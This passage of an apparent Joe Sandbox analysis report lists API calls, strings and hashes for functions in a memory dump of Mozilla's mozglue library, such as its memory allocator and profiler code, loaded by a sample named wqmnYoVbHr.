                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$AllocVirtual
                                                                  • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 618468079-3566792288
                                                                  • Opcode ID: 9122cea01531788da4496428bdab7b4fad923b00e811d545da2e3f391960931a
                                                                  • Instruction ID: 88addb078d5c96b154a00c3ebff837cb7a9f7cc94697355e12b628a1ef932d17
                                                                  • Opcode Fuzzy Hash: 9122cea01531788da4496428bdab7b4fad923b00e811d545da2e3f391960931a
                                                                  • Instruction Fuzzy Hash: F0B292717057418FD724CF29C690716BBE1BF8A318F28CA6DE86A8B796D770E841CB41
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ProfileBuffer parse error: %s$data$expected a Count entry$expected a Time entry$name$schema
                                                                  • API String ID: 0-2712937348
                                                                  • Opcode ID: 5249082d134f102c313b5cea13581be7caf24fc9a57756416b640cbdd3ea119c
                                                                  • Instruction ID: f506eec7a8baa9169927291cc7e981b89037d52a2353cfe22dd02bd5c2bc68c6
                                                                  • Opcode Fuzzy Hash: 5249082d134f102c313b5cea13581be7caf24fc9a57756416b640cbdd3ea119c
                                                                  • Instruction Fuzzy Hash: DD926CB1A083458FD724CF28C49179AB7E1FFC9308F15891DE49A9BB51DB30E909CB92
                                                                  APIs
                                                                  • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C912ED3
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C912EE7
                                                                  • MozFormatCodeAddressDetails.MOZGLUE(?,000000FF,00000000,?,?), ref: 6C912F0D
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C913214
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C913242
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9136BF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: strlen$AddressCode$DescribeDetailsFormat
                                                                  • String ID: MOZ_PROFILER_SYMBOLICATE$get $set
                                                                  • API String ID: 2257098003-3318126862
                                                                  • Opcode ID: ffdd80cf07e7e932b8c7091de6be8fc64b37db01029a61b20dbda5aff66dfe02
                                                                  • Instruction ID: f4611951a884e96a2b4a93554b53751e61dfd08ca036e69260eb0b9277bb41ee
                                                                  • Opcode Fuzzy Hash: ffdd80cf07e7e932b8c7091de6be8fc64b37db01029a61b20dbda5aff66dfe02
                                                                  • Instruction Fuzzy Hash: 583259B420C3858FD724CF24C0916AEBBE6AFD9318F548C1DE59987B51DB30E94ACB52
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: memcpystrlen
                                                                  • String ID: (pre-xul)$data$name$schema
                                                                  • API String ID: 3412268980-999448898
                                                                  • Opcode ID: b3ffc6c2fb907754f28dacb4ee092f547297f44c61b417de9bda6032321fd06a
                                                                  • Instruction ID: e262ecf9084e04f8977ffc2648c8d88534cafce2a3b3046498c4fc5660d158e4
                                                                  • Opcode Fuzzy Hash: b3ffc6c2fb907754f28dacb4ee092f547297f44c61b417de9bda6032321fd06a
                                                                  • Instruction Fuzzy Hash: 0DE17FB1B043508BC710CF68885066BF7E9BF99314F158E2DE899D7790DB70ED098B92
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C94E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C8FD1C5), ref: 6C8ED4F2
                                                                  • LeaveCriticalSection.KERNEL32(6C94E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C8FD1C5), ref: 6C8ED50B
                                                                    • Part of subcall function 6C8CCFE0: EnterCriticalSection.KERNEL32(6C94E784), ref: 6C8CCFF6
                                                                    • Part of subcall function 6C8CCFE0: LeaveCriticalSection.KERNEL32(6C94E784), ref: 6C8CD026
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C8FD1C5), ref: 6C8ED52E
                                                                  • EnterCriticalSection.KERNEL32(6C94E7DC), ref: 6C8ED690
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C8ED6A6
                                                                  • LeaveCriticalSection.KERNEL32(6C94E7DC), ref: 6C8ED712
                                                                  • LeaveCriticalSection.KERNEL32(6C94E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C8FD1C5), ref: 6C8ED751
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C8ED7EA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                  • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                  • API String ID: 2690322072-3894294050
                                                                  • Opcode ID: 50747e3690578cc90d8e1398845749a5c31a3b26ee889b9cf5d1038cad04ebd6
                                                                  • Instruction ID: 38b11dd1b85924e3bf95e14b13fb6acad81201e29859fff70a8d6c808cd4d4d2
                                                                  • Opcode Fuzzy Hash: 50747e3690578cc90d8e1398845749a5c31a3b26ee889b9cf5d1038cad04ebd6
                                                                  • Instruction Fuzzy Hash: 29919671A087058FD724DF29C69062AB7F1EBCA718F158D2FD55A87B91D730E848CB81
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(-0000000C), ref: 6C8E5EDB
                                                                  • memset.VCRUNTIME140(6C927765,000000E5,55CCCCCC), ref: 6C8E5F27
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C8E5FB2
                                                                  • memset.VCRUNTIME140(6C927765,000000E5,94C09015), ref: 6C8E61F0
                                                                  • VirtualFree.KERNEL32(-00000001,00100000,00004000), ref: 6C8E7652
                                                                  Strings
                                                                  • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C8E72E3
                                                                  • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C8E72F8
                                                                  • MOZ_RELEASE_ASSERT(mNode), xrefs: 6C8E7BCD, 6C8E7C1F, 6C8E7C34, 6C8E80FD
                                                                  • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C8E730D
                                                                  • MOZ_CRASH(), xrefs: 6C8E7BA4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionmemset$EnterFreeLeaveVirtual
                                                                  • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 2613674957-1127040744
                                                                  • Opcode ID: 933f53be71d472c01952affbb8dd5c851c03b50d09b5782c23c8e8724973e86a
                                                                  • Instruction ID: bd8f3537d302e6b579f92908e6944e96768b0a7713fb22e5bf976d7cfe73817e
                                                                  • Opcode Fuzzy Hash: 933f53be71d472c01952affbb8dd5c851c03b50d09b5782c23c8e8724973e86a
                                                                  • Instruction Fuzzy Hash: 323361716057018FD324CF19C690615BBE2BF8A328F29CBADE5698F7A6D731E841CB41
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C8C3284,?,?,6C8E56F6), ref: 6C8C3492
                                                                  • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C8C3284,?,?,6C8E56F6), ref: 6C8C34A9
                                                                  • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C8C3284,?,?,6C8E56F6), ref: 6C8C34EF
                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C8C350E
                                                                  • __Init_thread_footer.LIBCMT ref: 6C8C3522
                                                                  • __aulldiv.LIBCMT ref: 6C8C3552
                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C8C3284,?,?,6C8E56F6), ref: 6C8C357C
                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C8C3284,?,?,6C8E56F6), ref: 6C8C3592
                                                                    • Part of subcall function 6C8FAB89: EnterCriticalSection.KERNEL32(6C94E370,?,?,?,6C8C34DE,6C94F6CC,?,?,?,?,?,?,?,6C8C3284), ref: 6C8FAB94
                                                                    • Part of subcall function 6C8FAB89: LeaveCriticalSection.KERNEL32(6C94E370,?,6C8C34DE,6C94F6CC,?,?,?,?,?,?,?,6C8C3284,?,?,6C8E56F6), ref: 6C8FABD1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                  • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                  • API String ID: 3634367004-706389432
                                                                  • Opcode ID: e132d585e2c1a2a38cfd178fd15c9687c769686a6118326d8b00baffe7d258f1
                                                                  • Instruction ID: 2556eb5b602880dc0222a9614720d2da9ef8e08f625ce4f88855212fbb103ee0
                                                                  • Opcode Fuzzy Hash: e132d585e2c1a2a38cfd178fd15c9687c769686a6118326d8b00baffe7d258f1
                                                                  • Instruction Fuzzy Hash: DD31C471B0424A9BDF10EFB9C958EEE73B5FB8630DF208429E515A3650D731D902CB61
                                                                  APIs
                                                                  • Sleep.KERNEL32(000007D0), ref: 6C924EFF
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C924F2E
                                                                  • moz_xmalloc.MOZGLUE ref: 6C924F52
                                                                  • memset.VCRUNTIME140(00000000,00000000), ref: 6C924F62
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9252B2
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9252E6
                                                                  • Sleep.KERNEL32(00000010), ref: 6C925481
                                                                  • free.MOZGLUE(?), ref: 6C925498
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                  • String ID: (
                                                                  • API String ID: 4104871533-3887548279
                                                                  • Opcode ID: 4544a021a06785fb92de84766101c2466a2d72e09fb5b5f6dce977d635de626b
                                                                  • Instruction ID: 7b14fed1c8259784ac4862e26e2b7b899453cae64c63e443d71477d514e9bfe5
                                                                  • Opcode Fuzzy Hash: 4544a021a06785fb92de84766101c2466a2d72e09fb5b5f6dce977d635de626b
                                                                  • Instruction Fuzzy Hash: CFF1E471A18B418FC716DF38C85062BB7F9AFD6388F15872EF886A7651DB31D8418B81
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C94E744), ref: 6C8D7885
                                                                  • LeaveCriticalSection.KERNEL32(6C94E744), ref: 6C8D78A5
                                                                  • EnterCriticalSection.KERNEL32(6C94E784), ref: 6C8D78AD
                                                                  • LeaveCriticalSection.KERNEL32(6C94E784), ref: 6C8D78CD
                                                                  • EnterCriticalSection.KERNEL32(6C94E7DC), ref: 6C8D78D4
                                                                  • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C8D78E9
                                                                  • EnterCriticalSection.KERNEL32(00000000), ref: 6C8D795D
                                                                  • memset.VCRUNTIME140(?,00000000,00000160), ref: 6C8D79BB
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C8D7BBC
                                                                  • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C8D7C82
                                                                  • LeaveCriticalSection.KERNEL32(6C94E7DC), ref: 6C8D7CD2
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C8D7DAF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeavememset
                                                                  • String ID:
                                                                  • API String ID: 759993129-0
                                                                  • Opcode ID: 1acc08a932e53d95b28421fcf29e2fcac10950b1cb61ecdca9b00056c7153bf1
                                                                  • Instruction ID: 22298d2f3bd6c35347830fddf76745c18a959bd06aac342d076f23a1f3c417b0
                                                                  • Opcode Fuzzy Hash: 1acc08a932e53d95b28421fcf29e2fcac10950b1cb61ecdca9b00056c7153bf1
                                                                  • Instruction Fuzzy Hash: 42027271A052198FDB64CF19C984799B7B5FF88318F2686AAD809A7715D730FE90CF80
                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32 ref: 6C926009
                                                                  • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C926024
                                                                  • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(6C8CEE51,?), ref: 6C926046
                                                                  • OutputDebugStringA.KERNEL32(?,6C8CEE51,?), ref: 6C926061
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C926069
                                                                  • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C926073
                                                                  • _dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C926082
                                                                  • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C94148E), ref: 6C926091
                                                                  • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,6C8CEE51,00000000,?), ref: 6C9260BA
                                                                  • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C9260C4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
                                                                  • String ID:
                                                                  • API String ID: 3835517998-0
                                                                  • Opcode ID: eb8941720c0c5ffac47747ffadcc9d969ae97f3c2c1b5fc3f4fdc3238457cf96
                                                                  • Instruction ID: 99c3a40be825b2d1deb29febbe20510e801b7b545fa2f76281afc92a5753393c
                                                                  • Opcode Fuzzy Hash: eb8941720c0c5ffac47747ffadcc9d969ae97f3c2c1b5fc3f4fdc3238457cf96
                                                                  • Instruction Fuzzy Hash: DF21A371A002089FDF206F29DC09AAE7BBCFF45218F10C468E85A97641DB74E959CFD1
                                                                  APIs
                                                                  • GetLastError.KERNEL32 ref: 6C927046
                                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C927060
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C92707E
                                                                    • Part of subcall function 6C8D81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C8D81DE
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C927096
                                                                  • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C92709C
                                                                  • LocalFree.KERNEL32(?), ref: 6C9270AA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
                                                                  • String ID: ### ERROR: %s: %s$(null)
                                                                  • API String ID: 2989430195-1695379354
                                                                  • Opcode ID: f09d2738e26c1d8a1c5be541c749af0689a1cecbe6cd020366ad225c63a0d6b4
                                                                  • Instruction ID: fa041e63de84bd520d6b2090404165e2ea2b16339d79271bce6f7fb5a12ac59b
                                                                  • Opcode Fuzzy Hash: f09d2738e26c1d8a1c5be541c749af0689a1cecbe6cd020366ad225c63a0d6b4
                                                                  • Instruction Fuzzy Hash: B2018DB1A04104AFDF04BBA8DC4ADAF7BBCEF49259F114435FA05E7241D671A918CBE1
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C8E9EB8
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C8E9F24
                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C8E9F34
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C8EA823
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C8EA83C
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C8EA849
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$K@1@LeaveMaybe@_RandomUint64@mozilla@@$Entermemset
                                                                  • String ID: MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 2950001534-1351931279
                                                                  • Opcode ID: 2a58d936dc20ff800c86a4ef39cdcf6d237b643cc4645102e0bfe6fd51c91c0a
                                                                  • Instruction ID: 6d21e9ce9b4d333e05026c39864ac7ed088f9c293746f14351bf6f85b97b57ea
                                                                  • Opcode Fuzzy Hash: 2a58d936dc20ff800c86a4ef39cdcf6d237b643cc4645102e0bfe6fd51c91c0a
                                                                  • Instruction Fuzzy Hash: CC727D72A156118FD324CF28C640655FFF1BF8A728F29CA6DE8699B791D371E841CB80
                                                                  APIs
                                                                  • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C912C31
                                                                  • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C912C61
                                                                    • Part of subcall function 6C8C4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C8C4E5A
                                                                    • Part of subcall function 6C8C4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C8C4E97
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C912C82
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C912E2D
                                                                    • Part of subcall function 6C8D81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C8D81DE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                  • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                  • API String ID: 801438305-4149320968
                                                                  • Opcode ID: 7011809275e48f594adbe84147434ec92fb244e4fa956be8d71879bd6bd873a0
                                                                  • Instruction ID: 515280b6ea0c446527905e33b013fe406264f5b021ba039a6c4dd4acd5a1fbf3
                                                                  • Opcode Fuzzy Hash: 7011809275e48f594adbe84147434ec92fb244e4fa956be8d71879bd6bd873a0
                                                                  • Instruction Fuzzy Hash: 7791DFB460C7448FC724DF28C49669EB7F4AFCA358F10892DE59A8BB50DB30D949CB52
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0123456789abcdef$MOZ_CRASH()
